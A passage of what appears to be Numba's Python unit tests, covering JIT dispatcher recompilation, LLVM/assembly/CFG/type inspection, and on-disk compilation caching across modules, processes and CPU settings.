self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=utils.StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
This test an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguous first but the compiler checks
for C contiguous first. This results in an C contiguous code inserted
as F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: "
"stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
@tag('important')
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted loops', str(w[0].message))
def test_big_array(self):
# Code references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Function with the same names should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
def test_caching_mutliple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be pass as argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_cannot_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
with self.assertRaises(TypeError) as raises:
foo(fn)
self.assertRegexpMatches(str(raises.exception),
"cannot convert native .* to Python object")
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
